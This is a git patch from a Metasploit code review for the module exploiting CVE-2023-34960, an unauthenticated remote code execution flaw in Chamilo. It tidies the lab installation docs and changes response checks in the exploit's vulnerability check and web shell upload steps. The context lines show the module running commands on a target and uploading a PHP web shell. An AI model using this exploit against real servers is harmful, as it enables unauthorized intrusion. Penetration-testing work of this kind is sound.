From 1db284dcaa4cb6547795b4e22f50401a4fe6cd5b Mon Sep 17 00:00:00 2001 From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com> Date: Tue, 22 Aug 2023 18:46:25 +0200 Subject: [PATCH] Apply suggestions from code review Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com> --- .../http/chamilo_unauth_rce_cve_2023_34960.md | 21 +++++++------------ .../http/chamilo_unauth_rce_cve_2023_34960.rb | 4 ++-- 2 files changed, 9 insertions(+), 16 deletions(-) diff --git a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md index 61954f2fcd..f70258323c 100644 --- a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md +++ b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md @@ -8,21 +8,14 @@ request at the vulnerable endpoint `/main/webservices/additional_webservices.php Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details. -This module has been tested on: -- [ ] Ubuntu Linux 22.04 -* Chamilo 1.11.18 -* PHP 7.4 +This module has been tested against Chamilo 1.11.18 on Ubuntu Linux 22.04 with PHP 7.4 -**Instructions for an Chamilo installation on Ubuntu 22.04:** -Download and install Ubuntu 22.04 server on VirtualBox. -[Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/). - -Download and install LAMP on Ubuntu 22.04 server. -[Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/). - -Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases). - -Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites). +### Installation +Instructions for a Chamilo installation on Ubuntu 22.04: +1. Download and install Ubuntu 22.04 server on VirtualBox (follow these [instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/)). +2. Download and install LAMP on Ubuntu 22.04 server (follow these [instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/)). +3. Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases). +4. Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites). ## Verification Steps diff --git a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb index f0bc54d650..fed6203ead 100644 --- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb +++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb @@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Checking if #{peer} can be exploited.") marker = Rex::Text.rand_text_alphanumeric(8..16) res = execute_command("echo #{marker}") - if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body =~ /#{marker}/ + if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body.include?(marker) CheckCode::Vulnerable else CheckCode::Safe('No valid response received from the target.') @@ -203,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote case target['Type'] when :php res = upload_webshell - fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body =~ /wsConvertPptResponse/ + fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse') register_file_for_cleanup(@webshell_name.to_s) execute_php(payload.encoded) when :unix_cmd